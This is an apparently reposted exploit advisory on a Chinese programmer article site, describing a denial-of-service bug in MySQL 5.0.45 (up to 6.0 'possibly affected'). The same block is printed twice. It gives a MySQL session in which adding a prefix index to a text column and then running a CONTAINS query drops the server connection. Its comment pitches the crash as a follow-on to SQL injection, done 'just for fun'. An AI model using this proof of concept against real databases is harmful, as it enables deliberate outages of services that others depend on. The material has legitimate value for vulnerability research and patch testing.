mysql 5.0.45 (修改)拒绝服务漏洞
程序员文章站
2023-12-16 13:09:34
mysql 5.0.45 (修改)拒绝服务漏洞 /* * mysql <=6.0 possibly affected * kristian erik hermanse...
mysql 5.0.45 (修改)拒绝服务漏洞
/*
* mysql <=6.0 possibly affected
* kristian erik hermansen
* credit: joe gallo
* you must have alter permissions to exploit this bug!
* scenario: you found sql injection, but you want to punch backend server
* in the nuts just for fun. start with the alter table statement on
* a table and field you know to exist. the first two sql statements are
* simply to demostrate reproducibility...
*/
<snip>
mysql> create table `test` (
`id` int(10) unsigned not null auto_increment primary key,
`foo` text not null
) engine=innodb default charset=latin1;
query ok, 0 rows affected
mysql> select * from test where contains(foo, ''bar'');
empty set
mysql> alter table test add index (foo(100));
query ok, 0 rows affected
records: 0 duplicates: 0 warnings: 0
mysql> select * from test where contains(foo, ''bar'');
error 2013 : lost connection to mysql server during query
</snip>
/*
* mysql <=6.0 possibly affected
* kristian erik hermansen
* credit: joe gallo
* you must have alter permissions to exploit this bug!
* scenario: you found sql injection, but you want to punch backend server
* in the nuts just for fun. start with the alter table statement on
* a table and field you know to exist. the first two sql statements are
* simply to demostrate reproducibility...
*/
<snip>
mysql> create table `test` (
`id` int(10) unsigned not null auto_increment primary key,
`foo` text not null
) engine=innodb default charset=latin1;
query ok, 0 rows affected
mysql> select * from test where contains(foo, ''bar'');
empty set
mysql> alter table test add index (foo(100));
query ok, 0 rows affected
records: 0 duplicates: 0 warnings: 0
mysql> select * from test where contains(foo, ''bar'');
error 2013 : lost connection to mysql server during query
</snip>